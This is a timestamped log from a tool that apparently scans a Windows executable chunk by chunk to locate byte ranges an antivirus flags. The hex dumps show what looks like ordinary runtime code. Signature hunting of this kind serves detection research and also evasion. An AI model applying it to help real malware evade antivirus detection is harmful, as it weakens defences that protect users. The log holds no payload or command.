[INFO    ][2023-07-21 13:34:29,689] _scanDataPart() :: Result: 4900-4917 (17b minChunk:16 X)
00001324   40 00 FF 15 10 20 41 00 C3 55 8B EC 56 57 8B 7D    @.... A..U..VW.}
00001334   08                                                 .
[INFO    ][2023-07-21 13:34:29,690] _scanDataPart() :: Result: 5002-5019 (17b minChunk:16 X)
0000138A   C3 53 56 BE F8 8E 41 00 BB F8 8E 41 00 3B F3 73    .SV...A....A.;.s
0000139A   19                                                 .
[INFO    ][2023-07-21 13:34:29,691] _scanDataPart() :: Result: 5036-5053 (17b minChunk:16 X)
000013AC   83 C6 04 3B F3 72 E9 5F 5E 5B C3 53 56 BE 00 8F    ...;.r._^[.SV...
000013BC   41                                                 A
[INFO    ][2023-07-21 13:34:29,693] _scanDataPart() :: Result: 5104-5138 (34 bytes)
000013F0   68 60 22 40 00 64 FF 35 00 00 00 00 8B 44 24 10    h`"@.d.5.....D$.
00001400   89 6C 24 10 8D 6C 24 10 2B E0 53 56 57 A1 04 A0    .l$..l$.+.SVW...
00001410   41 00                                              A.
[INFO    ][2023-07-21 13:34:29,693] _scanDataPart() :: Result: 5138-5172 (34 bytes)
00001412   31 45 FC 33 C5 50 89 65 E8 FF 75 F8 8B 45 FC C7    1E.3.P.e..u..E..
00001422   45 FC FE FF FF FF 89 45 F8 8D 45 F0 64 A3 00 00    E......E..E.d...
00001432   00 00                                              ..
[INFO    ][2023-07-21 13:34:29,694] _scanDataPart() :: Result: 5172-5206 (34 bytes)
00001434   C3 55 8B EC 83 25 18 AC 41 00 00 83 EC 24 83 0D    .U...%..A....$..
00001444   10 A0 41 00 01 6A 0A FF 15 1C 20 41 00 85 C0 0F    ..A..j.... A....
00001454   84 A9                                              ..
[INFO    ][2023-07-21 13:34:29,695] _scanDataPart() :: Result: 5206-5240 (34 bytes)
00001456   01 00 00 83 65 F0 00 33 C0 53 56 57 33 C9 8D 7D    ....e..3.SVW3..}
00001466   DC 53 0F A2 8B F3 5B 89 07 89 77 04 89 4F 08 33    .S....[...w..O.3
00001476   C9 89                                              ..
[INFO    ][2023-07-21 13:34:29,696] _scanDataPart() :: Result: 5240-5274 (34 bytes)
00001478   57 0C 8B 45 DC 8B 7D E4 89 45 F4 81 F7 6E 74 65    W..E..}..E...nte
00001488   6C 8B 45 E8 35 69 6E 65 49 89 45 F8 8B 45 E0 35    l.E.5ineI.E..E.5
00001498   47 65                                              Ge
[INFO    ][2023-07-21 13:34:29,696] _scanDataPart() :: Result: 5274-5291 (17b minChunk:16 X)
0000149A   6E 75 89 45 FC 33 C0 40 53 0F A2 8B F3 5B 8D 5D    nu.E.3.@S....[.]
000014AA   DC                                                 .
[INFO    ][2023-07-21 13:34:29,697] _scanDataPart() :: Result: 5308-5325 (17b minChunk:16 X)
000014BC   53 0C 75 43 8B 45 DC 25 F0 3F FF 0F 3D C0 06 01    S.uC.E.%.?..=...
000014CC   00                                                 .
[INFO    ][2023-07-21 13:34:29,699] _scanDataPart() :: Doubling: minChunkSize: 16  minMatchSize: 32
[INFO    ][2023-07-21 13:34:29,700] _scanDataPart() :: Result: 5376-5410 (34b minChunk:32 X)
00001500   00 EB 06 8B 3D 1C AC 41 00 8B 4D E4 6A 07 58 89    ....=..A..M.j.X.
00001510   4D FC 39 45 F4 7C 2F 33 C9 53 0F A2 8B F3 5B 8D    M.9E.|/3.S....[.
00001520   5D DC                                              ].
[INFO    ][2023-07-21 13:34:29,700] _scanDataPart() :: Result: 5410-5444 (34b minChunk:32 X)
00001522   89 03 89 73 04 89 4B 08 8B 4D FC 89 53 0C 8B 5D    ...s..K..M..S..]
00001532   E0 F7 C3 00 02 00 00 74 0E 83 CF 02 89 3D 1C AC    .......t.....=..
00001542   41 00                                              A.
[INFO    ][2023-07-21 13:34:29,700] _scanDataPart() :: Result: 5444-5512 (68 bytes)
00001544   EB 03 8B 5D F0 A1 10 A0 41 00 83 C8 02 C7 05 18    ...]....A.......
00001554   AC 41 00 01 00 00 00 A3 10 A0 41 00 F7 C1 00 00    .A........A.....
00001564   10 00 0F 84 93 00 00 00 83 C8 04 C7 05 18 AC 41    ...............A
00001574   00 02 00 00 00 A3 10 A0 41 00 F7 C1 00 00 00 08    ........A.......
00001584   74 79 F7 C1                                        ty..
[INFO    ][2023-07-21 13:34:29,701] _scanDataPart() :: Result: 5614-5648 (34b minChunk:32 X)
000015EE   3B C2 75 0D 83 0D 10 A0 41 00 40 89 35 18 AC 41    ;.u.....A.@.5..A
000015FE   00 5F 5E 5B 33 C0 C9 C3 33 C0 39 05 E8 B3 41 00    ._^[3...3.9...A.
0000160E   0F 95                                              ..
[INFO    ][2023-07-21 13:34:29,702] _scanDataPart() :: Result: 5648-5682 (34b minChunk:32 X)
00001610   C0 C3 CC CC CC CC CC CC CC CC CC CC CC CC CC CC    ................
00001620   55 8B EC 56 8B 75 08 57 8B 7D 0C 8B 06 83 F8 FE    U..V.u.W.}......
00001630   74 0D                                              t.
[INFO    ][2023-07-21 13:34:29,704] _scanDataPart() :: Result: 6056-6124 (68 bytes)
000017A8   E8 73 FE FF FF 8B 4D EC 83 C4 08 8B D6 8B 49 08    .s....M.......I.
000017B8   E8 C3 03 00 00 CC E8 4E 05 00 00 84 C0 75 03 32    .......N.....u.2
000017C8   C0 C3 E8 F4 04 00 00 84 C0 75 07 E8 75 05 00 00    .........u..u...
000017D8   EB ED B0 01 C3 55 8B EC 80 7D 08 00 75 0A E8 0B    .....U...}..u...
000017E8   05 00 00 E8                                        ....
[INFO    ][2023-07-21 13:34:29,705] _scanDataPart() :: Result: 6396-6464 (68 bytes)
000018FC   03 00 00 83 C0 10 C3 E8 1B 03 00 00 83 C0 14 C3    ................
0000190C   CC CC CC CC 8B 4C 24 0C 0F B6 44 24 08 8B D7 8B    .....L$...D$....
0000191C   7C 24 04 85 C9 0F 84 3C 01 00 00 69 C0 01 01 01    |$.....<...i....
0000192C   01 83 F9 20 0F 86 DF 00 00 00 81 F9 80 00 00 00    ... ............
0000193C   0F 82 8B 00                                        ....
[INFO    ][2023-07-21 13:34:29,707] _scanDataPart() :: Result: 6464-6532 (68 bytes)
00001940   00 00 0F BA 25 1C AC 41 00 01 73 09 F3 AA 8B 44    ....%..A..s....D
00001950   24 04 8B FA C3 0F BA 25 10 A0 41 00 01 0F 83 B2    $......%..A.....
00001960   00 00 00 66 0F 6E C0 66 0F 70 C0 00 03 CF 0F 11    ...f.n.f.p......
00001970   07 83 C7 10 83 E7 F0 2B CF 81 F9 80 00 00 00 76    .......+.......v
00001980   4C 8D A4 24                                        L..$
[INFO    ][2023-07-21 13:34:29,707] _scanDataPart() :: Result: 6532-6600 (68 bytes)
00001984   00 00 00 00 8D A4 24 00 00 00 00 90 66 0F 7F 07    ......$.....f...
00001994   66 0F 7F 47 10 66 0F 7F 47 20 66 0F 7F 47 30 66    f..G.f..G f..G0f
000019A4   0F 7F 47 40 66 0F 7F 47 50 66 0F 7F 47 60 66 0F    ..G@f..GPf..G`f.
000019B4   7F 47 70 8D BF 80 00 00 00 81 E9 80 00 00 00 F7    .Gp.............
000019C4   C1 00 FF FF                                        ....
[INFO    ][2023-07-21 13:34:29,708] _scanDataPart() :: Result: 6600-6668 (68 bytes)
000019C8   FF 75 C5 EB 13 0F BA 25 10 A0 41 00 01 73 3E 66    .u.....%..A..s>f
000019D8   0F 6E C0 66 0F 70 C0 00 83 F9 20 72 1C F3 0F 7F    .n.f.p.... r....
000019E8   07 F3 0F 7F 47 10 83 C7 20 83 E9 20 83 F9 20 73    ....G... .. .. s
000019F8   EC F7 C1 1F 00 00 00 74 62 8D 7C 0F E0 F3 0F 7F    .......tb.|.....
00001A08   07 F3 0F 7F                                        ....
[INFO    ][2023-07-21 13:34:29,709] _scanDataPart() :: Result: 6668-6702 (34b minChunk:32 X)
00001A0C   47 10 8B 44 24 04 8B FA C3 F7 C1 03 00 00 00 74    G..D$..........t
00001A1C   0E 88 07 47 83 E9 01 F7 C1 03 00 00 00 75 F2 F7    ...G.........u..
00001A2C   C1 04                                              ..
[INFO    ][2023-07-21 13:34:29,710] _scanDataPart() :: Result: 6736-6770 (34b minChunk:32 X)
00001A50   89 07 89 47 04 83 C7 08 83 E9 08 F7 C1 F8 FF FF    ...G............
00001A60   FF 75 ED 8B 44 24 04 8B FA C3 CC CC CC CC CC CC    .u..D$..........
00001A70   53 56                                              SV
[INFO    ][2023-07-21 13:34:29,712] _scanDataPart() :: Result: 7348-7416 (68 bytes)
00001CB4   00 59 5E 57 FF 15 4C 20 41 00 5F 8B C3 5B C3 68    .Y^W..L A._..[.h
00001CC4   07 28 40 00 E8 B9 01 00 00 A3 20 A0 41 00 59 83    .(@....... .A.Y.
00001CD4   F8 FF 75 03 32 C0 C3 68 24 AC 41 00 50 E8 51 02    ..u.2..h$.A.P.Q.
00001CE4   00 00 59 59 85 C0 75 07 E8 05 00 00 00 EB E5 B0    ..YY..u.........
00001CF4   01 C3 A1 20                                        ... 
[INFO    ][2023-07-21 13:34:29,712] _scanDataPart() :: Result: 7416-7484 (68 bytes)
00001CF8   A0 41 00 83 F8 FF 74 0E 50 E8 BB 01 00 00 83 0D    .A....t.P.......
00001D08   20 A0 41 00 FF 59 B0 01 C3 56 57 BF 4C AC 41 00     .A..Y...VW.L.A.
00001D18   33 F6 6A 00 68 A0 0F 00 00 57 E8 4E 02 00 00 83    3.j.h....W.N....
00001D28   C4 0C 85 C0 74 15 FF 05 64 AC 41 00 83 C6 18 83    ....t...d.A.....
00001D38   C7 18 83 FE                                        ....
[INFO    ][2023-07-21 13:34:29,713] _scanDataPart() :: Result: 7484-7518 (34b minChunk:32 X)
00001D3C   18 72 DB B0 01 EB 07 E8 05 00 00 00 32 C0 5F 5E    .r..........2._^
00001D4C   C3 56 8B 35 64 AC 41 00 85 F6 74 20 6B C6 18 57    .V.5d.A...t k..W
00001D5C   8D B8                                              ..
[INFO    ][2023-07-21 13:34:29,715] _scanDataPart() :: Result: 7586-7620 (34b minChunk:32 X)
00001DA2   C3 55 8B EC 51 53 56 57 8B 7D 08 EB 6F 8B 07 8D    .U..QSVW.}..o...
00001DB2   1C 85 A4 AC 41 00 8B 33 85 F6 74 07 83 FE FF 75    ....A..3..t....u
00001DC2   76 EB                                              v.
[INFO    ][2023-07-21 13:34:29,716] _scanDataPart() :: Result: 7620-7654 (34b minChunk:32 X)
00001DC4   56 8B 04 85 20 2B 41 00 68 00 08 00 00 6A 00 50    V... +A.h....j.P
00001DD4   89 45 FC FF 15 78 20 41 00 8B F0 85 F6 75 47 FF    .E...x A.....uG.
00001DE4   15 48                                              .H
[INFO    ][2023-07-21 13:34:30,425] _scanDataPart() :: Result: 7688-7756 (68 bytes)
00001E08   00 56 FF 15 78 20 41 00 8B F0 85 F6 75 14 83 C8    .V..x A.....u...
00001E18   FF 87 03 83 C7 04 3B 7D 0C 75 8C 33 C0 5F 5E 5B    ......;}.u.3._^[
00001E28   C9 C3 8B C6 87 03 85 C0 74 07 56 FF 15 70 20 41    ........t.V..p A
00001E38   00 8B C6 EB E8 55 8B EC 8B 45 08 56 57 8D 3C 85    .....U...E.VW.<.
00001E48   B0 AC 41 00                                        ..A.
[INFO    ][2023-07-21 13:34:31,088] _scanDataPart() :: Result: 7756-7824 (68 bytes)
00001E4C   8B 07 83 CE FF 3B C6 74 2B 85 C0 75 29 FF 75 14    .....;.t+..u).u.
00001E5C   FF 75 10 E8 3F FF FF FF 59 59 85 C0 74 14 FF 75    .u..?...YY..t..u
00001E6C   0C 50 FF 15 74 20 41 00 85 C0 74 06 8B C8 87 0F    .P..t A...t.....
00001E7C   EB 04 87 37 33 C0 5F 5E 5D C3 55 8B EC 56 68 D0    ...73._^].U..Vh.
00001E8C   2B 41 00 68                                        +A.h
[INFO    ][2023-07-21 13:34:31,089] _scanDataPart() :: Result: 7824-7892 (68 bytes)
00001E90   C8 2B 41 00 68 D0 2B 41 00 6A 00 E8 9D FF FF FF    .+A.h.+A.j......
00001EA0   8B F0 83 C4 10 85 F6 74 10 FF 75 08 8B CE FF 15    .......t..u.....
00001EB0   20 21 41 00 FF D6 5E 5D C3 5E 5D FF 25 60 20 41     !A...^].^].%` A
00001EC0   00 55 8B EC 56 68 E4 2B 41 00 68 DC 2B 41 00 68    .U..Vh.+A.h.+A.h
00001ED0   E4 2B 41 00                                        .+A.
[INFO    ][2023-07-21 13:34:31,770] _scanDataPart() :: Result: 7960-8028 (68 bytes)
00001F18   10 8B F0 FF 75 08 85 F6 74 0C 8B CE FF 15 20 21    ....u...t..... !
00001F28   41 00 FF D6 EB 06 FF 15 64 20 41 00 5E 5D C3 55    A.......d A.^].U
00001F38   8B EC 56 68 08 2C 41 00 68 00 2C 41 00 68 08 2C    ..Vh.,A.h.,A.h.,
00001F48   41 00 6A 03 E8 EC FE FF FF 83 C4 10 8B F0 FF 75    A.j............u
00001F58   0C FF 75 08                                        ..u.
[INFO    ][2023-07-21 13:34:31,770] _printStatus() :: Reducing: 256 chunks done, found 27 matches (93 added)
[INFO    ][2023-07-21 13:34:32,397] _scanDataPart() :: Result: 8028-8096 (68 bytes)
00001F5C   85 F6 74 0C 8B CE FF 15 20 21 41 00 FF D6 EB 06    ..t..... !A.....
00001F6C   FF 15 68 20 41 00 5E 5D C3 55 8B EC 56 68 1C 2C    ..h A.^].U..Vh.,
00001F7C   41 00 68 14 2C 41 00 68 1C 2C 41 00 6A 04 E8 AE    A.h.,A.h.,A.j...
00001F8C   FE FF FF 8B F0 83 C4 10 85 F6 74 15 FF 75 10 8B    ..........t..u..
00001F9C   CE FF 75 0C                                        ..u.
[INFO    ][2023-07-21 13:34:33,085] _scanDataPart() :: Result: 8096-8164 (68 bytes)
00001FA0   FF 75 08 FF 15 20 21 41 00 FF D6 EB 0C FF 75 0C    .u... !A......u.
00001FB0   FF 75 08 FF 15 5C 20 41 00 5E 5D C3 CC CC CC CC    .u...\ A.^].....
00001FC0   57 56 8B 74 24 10 8B 4C 24 14 8B 7C 24 0C 8B C1    WV.t$..L$..|$...
00001FD0   8B D1 03 C6 3B FE 76 08 3B F8 0F 82 94 02 00 00    ....;.v.;.......
00001FE0   83 F9 20 0F                                        .. .
[INFO    ][2023-07-21 13:34:33,771] _scanDataPart() :: Result: 8164-8232 (68 bytes)
00001FE4   82 D2 04 00 00 81 F9 80 00 00 00 73 13 0F BA 25    ...........s...%
00001FF4   10 A0 41 00 01 0F 82 8E 04 00 00 E9 E3 01 00 00    ..A.............
00002004   0F BA 25 1C AC 41 00 01 73 09 F3 A4 8B 44 24 0C    ..%..A..s....D$.
00002014   5E 5F C3 8B C7 33 C6 A9 0F 00 00 00 75 0E 0F BA    ^_...3......u...
00002024   25 10 A0 41                                        %..A
[INFO    ][2023-07-21 13:34:33,771] _printStatus() :: Reducing: 262 chunks done, found 27 matches (96 added)
[INFO    ][2023-07-21 13:34:33,772] _scanDataPart() :: Result: 8232-8266 (34b minChunk:32 X)
00002028   00 01 0F 82 E0 03 00 00 0F BA 25 1C AC 41 00 00    ..........%..A..
00002038   0F 83 A9 01 00 00 F7 C7 03 00 00 00 0F 85 9D 01    ................
00002048   00 00                                              ..
[INFO    ][2023-07-21 13:34:34,563] _scanDataPart() :: Result: 8674-8708 (34b minChunk:32 X)
000021E2   2E 40 00 FF E0 F7 C7 03 00 00 00 74 13 8A 06 88    .@.........t....
000021F2   07 49 83 C6 01 83 C7 01 F7 C7 03 00 00 00 75 ED    .I............u.
00002202   8B D1                                              ..
[INFO    ][2023-07-21 13:34:35,265] _scanDataPart() :: Result: 8708-8776 (68 bytes)
00002204   83 F9 20 0F 82 AE 02 00 00 C1 E9 02 F3 A5 83 E2    .. .............
00002214   03 FF 24 95 24 2E 40 00 FF 24 8D 34 2E 40 00 90    ..$.$.@..$.4.@..
00002224   34 2E 40 00 3C 2E 40 00 48 2E 40 00 5C 2E 40 00    4.@.<.@.H.@.\.@.
00002234   8B 44 24 0C 5E 5F C3 90 8A 06 88 07 8B 44 24 0C    .D$.^_.......D$.
00002244   5E 5F C3 90                                        ^_..
[INFO    ][2023-07-21 13:34:36,237] _printStatus() :: Reducing: 276 chunks done, found 28 matches (99 added)
[INFO    ][2023-07-21 13:34:36,238] _scanDataPart() :: Result: 9218-9252 (34b minChunk:32 X)
00002402   75 F1 8B 44 24 0C 5E 5F C3 EB 03 CC CC CC 8B C6    u..D$.^_........
00002412   83 E0 0F 85 C0 0F 85 E3 00 00 00 8B D1 83 E1 7F    ................
00002422   C1 EA                                              ..
[INFO    ][2023-07-21 13:34:36,924] _scanDataPart() :: Result: 9252-9320 (68 bytes)
00002424   07 74 66 8D A4 24 00 00 00 00 8B FF 66 0F 6F 06    .tf..$......f.o.
00002434   66 0F 6F 4E 10 66 0F 6F 56 20 66 0F 6F 5E 30 66    f.oN.f.oV f.o^0f
00002444   0F 7F 07 66 0F 7F 4F 10 66 0F 7F 57 20 66 0F 7F    ...f..O.f..W f..
00002454   5F 30 66 0F 6F 66 40 66 0F 6F 6E 50 66 0F 6F 76    _0f.of@f.onPf.ov
00002464   60 66 0F 6F                                        `f.o
[INFO    ][2023-07-21 13:34:37,613] _scanDataPart() :: Result: 9320-9388 (68 bytes)
00002468   7E 70 66 0F 7F 67 40 66 0F 7F 6F 50 66 0F 7F 77    ~pf..g@f..oPf..w
00002478   60 66 0F 7F 7F 70 8D B6 80 00 00 00 8D BF 80 00    `f...p..........
00002488   00 00 4A 75 A3 85 C9 74 5F 8B D1 C1 EA 05 85 D2    ..Ju...t_.......
00002498   74 21 8D 9B 00 00 00 00 F3 0F 6F 06 F3 0F 6F 4E    t!........o...oN
000024A8   10 F3 0F 7F                                        ....
[INFO    ][2023-07-21 13:34:38,345] _scanDataPart() :: Result: 9388-9456 (68 bytes)
000024AC   07 F3 0F 7F 4F 10 8D 76 20 8D 7F 20 4A 75 E5 83    ....O..v .. Ju..
000024BC   E1 1F 74 30 8B C1 C1 E9 02 74 0F 8B 16 89 17 83    ..t0.....t......
000024CC   C7 04 83 C6 04 83 E9 01 75 F1 8B C8 83 E1 03 74    ........u......t
000024DC   13 8A 06 88 07 46 47 49 75 F7 8D A4 24 00 00 00    .....FGIu...$...
000024EC   00 8D 49 00                                        ..I.
[INFO    ][2023-07-21 13:34:38,346] _printStatus() :: Reducing: 281 chunks done, found 29 matches (103 added)
[INFO    ][2023-07-21 13:34:39,187] _scanDataPart() :: Result: 9456-9490 (34b minChunk:32 X)
000024F0   8B 44 24 0C 5E 5F C3 8D A4 24 00 00 00 00 8B FF    .D$.^_...$......
00002500   BA 10 00 00 00 2B D0 2B CA 51 8B C2 8B C8 83 E1    .....+.+.Q......
00002510   03 74                                              .t
[INFO    ][2023-07-21 13:34:39,797] _scanDataPart() :: Result: 9524-9592 (68 bytes)
00002534   CC CC CC CC CC CC CC CC CC CC CC CC A1 C8 AC 41    ...............A
00002544   00 56 6A 03 5E 85 C0 75 07 B8 00 02 00 00 EB 06    .Vj.^..u........
00002554   3B C6 7D 07 8B C6 A3 C8 AC 41 00 6A 04 50 E8 57    ;.}......A.j.P.W
00002564   3A 00 00 6A 00 A3 CC AC 41 00 E8 A8 3A 00 00 83    :..j....A...:...
00002574   C4 0C 83 3D                                        ...=
[INFO    ][2023-07-21 13:34:40,484] _scanDataPart() :: Result: 9592-9660 (68 bytes)
00002578   CC AC 41 00 00 75 2B 6A 04 56 89 35 C8 AC 41 00    ..A..u+j.V.5..A.
00002588   E8 31 3A 00 00 6A 00 A3 CC AC 41 00 E8 82 3A 00    .1:..j....A...:.
00002598   00 83 C4 0C 83 3D CC AC 41 00 00 75 05 83 C8 FF    .....=..A..u....
000025A8   5E C3 57 33 FF BE 40 A0 41 00 6A 00 68 A0 0F 00    ^.W3..@.A.j.h...
000025B8   00 8D 46 20                                        ..F 
[INFO    ][2023-07-21 13:34:40,485] _printStatus() :: Reducing: 288 chunks done, found 30 matches (106 added)
[INFO    ][2023-07-21 13:34:41,196] _scanDataPart() :: Result: 9660-9728 (68 bytes)
000025BC   50 E8 C7 3D 00 00 A1 CC AC 41 00 8B D7 C1 FA 06    P..=.....A......
000025CC   89 34 B8 8B C7 83 E0 3F 6B C8 38 8B 04 95 20 B0    .4.....?k.8... .
000025DC   41 00 8B 44 08 18 83 F8 FF 74 09 83 F8 FE 74 04    A..D.....t....t.
000025EC   85 C0 75 07 C7 46 10 FE FF FF FF 83 C6 38 47 81    ..u..F.......8G.
000025FC   FE E8 A0 41                                        ...A
[INFO    ][2023-07-21 13:34:42,011] _scanDataPart() :: Result: 9728-9762 (34b minChunk:32 X)
00002600   00 75 AF 5F 33 C0 5E C3 8B FF 55 8B EC 6B 45 08    .u._3.^...U..kE.
00002610   38 05 40 A0 41 00 5D C3 8B FF 56 E8 D8 41 00 00    8.@.A.]...V..A..
00002620   E8 9E                                              ..
[INFO    ][2023-07-21 13:34:42,823] _printStatus() :: Reducing: 299 chunks done, found 30 matches (108 added)
[INFO    ][2023-07-21 13:34:42,823] _scanDataPart() :: Result: 9830-9864 (34b minChunk:32 X)
00002666   55 8B EC 8B 45 08 83 C0 20 50 FF 15 50 20 41 00    U...E... P..P A.
00002676   5D C3 8B FF 55 8B EC 8B 45 08 83 C0 20 50 FF 15    ]...U...E... P..
00002686   54 20                                              T 
[INFO    ][2023-07-21 13:34:42,823] _scanDataPart() :: Doubling: minChunkSize: 32  minMatchSize: 64
[INFO    ][2023-07-21 13:34:42,824] _scanDataPart() :: Result: 9864-10000 (136 bytes)
00002688   41 00 5D C3 6A 0C 68 68 8F 41 00 E8 58 ED FF FF    A.].j.hh.A..X...
00002698   83 65 E4 00 8B 45 08 FF 30 E8 BE FF FF FF 59 83    .e...E..0.....Y.
000026A8   65 FC 00 8B 4D 0C E8 34 06 00 00 8B F0 89 75 E4    e...M..4......u.
000026B8   C7 45 FC FE FF FF FF E8 17 00 00 00 8B C6 8B 4D    .E.............M
000026C8   F0 64 89 0D 00 00 00 00 59 5F 5E 5B C9 C2 0C 00    .d......Y_^[....
000026D8   8B 75 E4 8B 45 10 FF 30 E8 93 FF FF FF 59 C3 8B    .u..E..0.....Y..
000026E8   FF 55 8B EC 81 EC 84 04 00 00 A1 04 A0 41 00 33    .U...........A.3
000026F8   C5 89 45 FC 83 7D 18 00 8B 45 10 53 8B 5D 14 89    ..E..}...E.S.]..
00002708   85 A0 FB FF FF 75 18 E8                            .....u..
[INFO    ][2023-07-21 13:34:42,825] _scanDataPart() :: Result: 11156-11224 (68b minChunk:64 X)
00002B94   06 46 3B 75 10 7C EB 5F 5B 5E 5D C3 8B FF 55 8B    .F;u.|._[^]...U.
00002BA4   EC 51 33 D2 89 4D FC 89 11 33 C0 89 51 04 89 51    .Q3..M...3..Q..Q
00002BB4   08 89 51 0C 66 89 41 32 8B C1 89 51 10 89 51 14    ..Q.f.A2...Q..Q.
00002BC4   89 51 18 89 51 1C 89 51 20 89 51 24 89 51 28 88    .Q..Q..Q .Q$.Q(.
00002BD4   51 30 89 51                                        Q0.Q
[INFO    ][2023-07-21 13:34:42,826] _scanDataPart() :: Result: 11224-11360 (136 bytes)
00002BD8   38 88 51 3C 89 91 40 04 00 00 89 91 44 04 00 00    8.Q<..@.....D...
00002BE8   C9 C3 8B FF 55 8B EC 56 8B F1 E8 A9 FF FF FF 8B    ....U..V........
00002BF8   45 08 8B 00 89 86 48 04 00 00 8B 45 0C 89 06 8B    E.....H....E....
00002C08   45 10 89 46 04 8B 45 18 89 46 08 8B 45 14 89 46    E..F..E..F..E..F
00002C18   10 8B 45 1C 89 46 14 8B C6 5E 5D C2 18 00 8B FF    ..E..F...^].....
00002C28   55 8B EC 53 57 8B F9 8B 4D 08 C6 47 0C 00 8D 5F    U..SW...M..G..._
00002C38   04 85 C9 74 09 8B 01 89 03 8B 41 04 EB 15 83 3D    ...t......A....=
00002C48   20 AF 41 00 00 75 11 A1 F0 A1 41 00 89 03 A1 F4     .A..u....A.....
00002C58   A1 41 00 89 43 04 EB 41                            .A..C..A
[INFO    ][2023-07-21 13:34:42,827] _scanDataPart() :: Result: 11360-11496 (136 bytes)
00002C60   56 E8 26 46 00 00 89 07 8D 77 08 53 50 8B 48 4C    V.&F.....w.SP.HL
00002C70   89 0B 8B 48 48 89 0E E8 62 48 00 00 56 FF 37 E8    ...HH...bH..V.7.
00002C80   87 48 00 00 8B 0F 83 C4 10 8B 81 50 03 00 00 5E    .H.........P...^
00002C90   A8 02 75 0D 83 C8 02 89 81 50 03 00 00 C6 47 0C    ..u......P....G.
00002CA0   01 8B C7 5F 5B 5D C2 04 00 8B FF 56 8B F1 FF B6    ..._[].....V....
00002CB0   04 04 00 00 E8 62 33 00 00 83 A6 04 04 00 00 00    .....b3.........
00002CC0   59 5E C3 8B FF 55 8B EC 56 8B F1 FF 36 E8 49 33    Y^...U..V...6.I3
00002CD0   00 00 8B 55 08 83 26 00 59 8B 02 89 06 8B C6 83    ...U..&.Y.......
00002CE0   22 00 5E 5D C2 04 00 8B                            ".^]....
[INFO    ][2023-07-21 13:34:42,828] _scanDataPart() :: Result: 11496-11632 (136 bytes)
00002CE8   FF 55 8B EC 81 EC 74 04 00 00 A1 04 A0 41 00 33    .U....t......A.3
00002CF8   C5 89 45 FC 56 8B F1 57 8B 06 8B 38 57 E8 36 55    ..E.V..W...8W.6U
00002D08   00 00 88 85 9C FB FF FF 8B 46 04 59 8D 8D 8C FB    .........F.Y....
00002D18   FF FF FF 30 E8 05 FF FF FF 8B 06 8D 8D A4 FB FF    ...0............
00002D28   FF 8B 00 89 85 A0 FB FF FF 8B 46 10 FF 30 8D 85    ..........F..0..
00002D38   90 FB FF FF 50 8B 46 0C FF 30 8B 46 08 FF 70 04    ....P.F..0.F..p.
00002D48   FF 30 8D 85 A0 FB FF FF 50 E8 94 FE FF FF 83 65    .0......P......e
00002D58   F4 00 8D 8D A4 FB FF FF E8 E6 01 00 00 8D 8D E4    ................
00002D68   FB FF FF 8B F0 E8 37 FF                            ......7.
[INFO    ][2023-07-21 13:34:42,829] _scanDataPart() :: Result: 11632-11700 (68b minChunk:64 X)
00002D70   FF FF 80 BD 98 FB FF FF 00 74 0D 8B 8D 8C FB FF    .........t......
00002D80   FF 83 A1 50 03 00 00 FD 57 FF B5 9C FB FF FF E8    ...P....W.......
00002D90   58 55 00 00 59 59 8B 4D FC 8B C6 5F 33 CD 5E E8    XU..YY.M..._3.^.
00002DA0   35 DD FF FF C9 C3 CC CC CC CC CC CC CC CC CC CC    5...............
00002DB0   8B FF 55 8B                                        ..U.
[INFO    ][2023-07-21 13:34:42,830] _scanDataPart() :: Result: 11768-11904 (136 bytes)
00002DF8   74 08 8A 48 01 40 84 C9 75 EE 8A 48 FF 8B D0 48    t..H.@..u..H...H
00002E08   80 F9 30 75 0C 8D 49 00 8A 48 FF 48 80 F9 30 74    ..0u..I..H.H..0t
00002E18   F7 3A CB 75 03 48 8B FF 8A 0A 8D 40 01 88 08 8D    .:.u.H.....@....
00002E28   52 01 84 C9 75 F2 5B 5D C3 8B FF 55 8B EC 8B 4D    R...u.[]...U...M
00002E38   08 8D 41 E0 66 83 F8 5A 77 0F 8D 41 E0 83 E0 7F    ..A.f..Zw..A....
00002E48   8B 0C C5 3C 2C 41 00 EB 02 33 C9 8B 45 0C 8D 04    ...<,A...3..E...
00002E58   C8 83 E0 7F 8B 04 C5 38 2C 41 00 5D C2 08 00 CC    .......8,A.]....
00002E68   CC CC CC CC CC CC CC CC 8B FF 55 8B EC 8B 45 0C    ..........U...E.
00002E78   53 56 57 8B 30 8B 45 08                            SVW.0.E.
[INFO    ][2023-07-21 13:34:42,831] _scanDataPart() :: Result: 12108-12176 (68b minChunk:64 X)
00002F4C   FF 53 56 8B F1 8D 8E 48 04 00 00 E8 51 10 00 00    .SV....H....Q...
00002F5C   84 C0 74 1B 33 DB 39 5E 10 0F 85 BE 00 00 00 E8    ..t.3.9^........
00002F6C   3B 30 00 00 C7 00 16 00 00 00 E8 73 2F 00 00 83    ;0.........s/...
00002F7C   C8 FF 5E 5B C3 89 5E 38 89 5E 1C E9 86 00 00 00    ..^[..^8.^......
00002F8C   83 46 10 02                                        .F..
[INFO    ][2023-07-21 13:34:42,832] _scanDataPart() :: Result: 12176-12312 (136 bytes)
00002F90   39 5E 18 0F 8C 90 00 00 00 FF 76 1C 0F B7 46 32    9^........v...F2
00002FA0   8B CE 50 E8 89 FE FF FF 89 46 1C 83 F8 08 74 BB    ..P......F....t.
00002FB0   83 F8 07 77 C6 FF 24 85 47 3C 40 00 8B CE E8 FD    ...w..$.G<@.....
00002FC0   01 00 00 EB 45 83 4E 28 FF 89 5E 24 88 5E 30 89    ....E.N(..^$.^0.
00002FD0   5E 20 89 5E 2C 88 5E 3C EB 38 8B CE E8 A2 01 00    ^ .^,.^<.8......
00002FE0   00 EB 27 8B CE E8 2A 0A 00 00 EB 1E 89 5E 28 EB    ..'...*......^(.
00002FF0   21 8B CE E8 4B 02 00 00 EB 10 8B CE E8 69 02 00    !...K........i..
00003000   00 EB 07 8B CE E8 50 05 00 00 84 C0 0F 84 69 FF    ......P.......i.
00003010   FF FF 8B 46 10 0F B7 00                            ...F....
[INFO    ][2023-07-21 13:34:42,833] _scanDataPart() :: Result: 12312-12380 (68b minChunk:64 X)
00003018   66 89 46 32 66 85 C0 0F 85 67 FF FF FF 83 46 10    f.F2f....g....F.
00003028   02 FF 86 50 04 00 00 83 BE 50 04 00 00 02 0F 85    ...P.....P......
00003038   45 FF FF FF 8B 46 18 E9 3A FF FF FF 8D 49 00 BC    E....F..:....I..
00003048   3B 40 00 C5 3B 40 00 DA 3B 40 00 E3 3B 40 00 EC    ;@..;@..;@..;@..
00003058   3B 40 00 F1                                        ;@..
